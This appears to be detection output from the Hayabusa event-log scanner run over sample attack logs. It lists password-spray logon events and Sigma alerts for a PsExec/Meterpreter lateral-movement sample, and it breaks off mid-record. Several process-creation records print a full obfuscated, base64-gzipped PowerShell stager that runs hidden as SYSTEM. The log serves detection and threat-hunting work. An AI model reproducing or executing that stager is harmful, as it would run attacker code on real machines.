DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:58.193 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sarmstrong : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:59.253 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: wstrzelec : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:32:00.320 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: zmathis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:32:01.393 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: melliott : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:32:02.451 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: kperryman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:32:03.525 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jorchilles : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:32:03.525 +09:00,-,-,medium,Password Spray,[condition] count(TargetUserName) by IpAddress >= 5 in timeframe [result] count:14 TargetUserName:bgreenwood/baker/drook/jorchilles/ssims/dmashburn/edygert/bgalbraith/bking/cragoso/jlake/smisenar/mdouglas/cspizor IpAddress:172.16.144.128 timeframe:5m,rules/hayabusa/default/alerts/Security/4648_BruteForce_PasswordSprayDetect.yml,- +2019-05-01 04:32:04.597 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jlake : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:32:05.675 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: edygert : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:32:06.738 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: drook : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:32:07.835 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dmashburn : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:32:08.911 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cspizor : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:32:09.973 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cragoso : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:32:11.051 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgalbraith : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:32:12.146 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bking : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:32:13.221 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mdouglas : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:32:14.281 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgreenwood : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:32:15.352 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: baker : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:32:16.402 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ssims : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:32:17.474 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 05:26:51.981 +09:00,IEWIN7,13,high,PowerShell as a Service in Registry,,rules/sigma/registry_event/sysmon_powershell_as_service.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:51.981 +09:00,IEWIN7,13,critical,CobaltStrike Service Installations in Registry,,rules/sigma/registry_event/sysmon_cobaltstrike_service_installs.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.090 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"" : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.090 +09:00,IEWIN7,1,medium,Mimikatz Command Line,,rules/sigma/process_creation/win_mimikatz_command_line.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.090 +09:00,IEWIN7,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.090 +09:00,IEWIN7,1,high,FromBase64String Command Line,,rules/sigma/process_creation/win_powershell_frombase64string.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.090 +09:00,IEWIN7,1,high,Suspicious PowerShell Parent Process,,rules/sigma/process_creation/win_susp_powershell_parent_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.090 +09:00,IEWIN7,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.090 +09:00,IEWIN7,1,medium,Curl Start Combination,,rules/sigma/process_creation/win_susp_curl_start_combo.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.090 +09:00,IEWIN7,1,medium,Too Long PowerShell Commandlines,,rules/sigma/process_creation/sysmon_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.106 +09:00,IEWIN7,1,informational,Process Creation,"Command: powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"" : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.106 +09:00,IEWIN7,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.106 +09:00,IEWIN7,1,medium,Mimikatz Command Line,,rules/sigma/process_creation/win_mimikatz_command_line.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.106 +09:00,IEWIN7,1,high,FromBase64String Command Line,,rules/sigma/process_creation/win_powershell_frombase64string.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.106 +09:00,IEWIN7,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.106 +09:00,IEWIN7,1,high,Suspicious PowerShell Command Line,,rules/sigma/process_creation/win_powershell_cmdline_special_characters.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.106 +09:00,IEWIN7,1,medium,Too Long PowerShell Commandlines,,rules/sigma/process_creation/sysmon_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.356 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""powershell.exe"" -noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String('H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA=='))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd())) : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: NT AUTHORITY\SYSTEM : Parent Command: powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKA